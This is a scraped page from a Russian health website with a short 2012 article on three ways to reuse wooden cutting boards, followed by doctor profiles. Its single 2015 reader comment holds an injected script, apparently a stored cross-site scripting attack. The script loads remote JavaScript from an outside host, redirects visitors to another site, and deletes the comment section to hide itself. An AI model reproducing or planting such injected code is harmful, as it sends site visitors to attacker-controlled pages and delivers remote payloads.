Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вторая жизнь разделочной ...  >>  Вторая жизнь разделочной доски
 
Обратная связь
 

Вторая жизнь разделочной доски

Размер шрифта
17 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Как выяснили ученые, деревянная разделочная доска является рассадником бактерий и грибков на кухне. Но они могут пригодиться не только на кухне.

1 

  1. Роликовая платформа

К широкой и толстой доске достаточно прикрутить стандартные ролики, и она превращается сидячую/лежачую платформу, которая незаменима для работ под автомобилем. Такое приспособление можно не только хранить в гараже, но и возить с собой в багажнике.

1

  1. Художественное панно

Любая разделочная доска превратится в настенное украшение, если ее просто обклеить декоративной салфеткой. Узор или рисунок, наложенный на доску любого размера, сделает интересной и нарядной стену на такой привычной кухне.

1

  1. Хранитель ключей

Декорированная рисунком, мелкая фигурная досочка станет незаменимой в прихожей, если снабдить любой формы крючками для ключей. Теперь не надо перед уходом искать, где лежат ключи. А гостей такое приспособление несомненно удивит и порадует оригинальостью.
 


Сюжеты по теме:
Достойная пенсия. Вторая жизнь деревянной разделочной доски 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.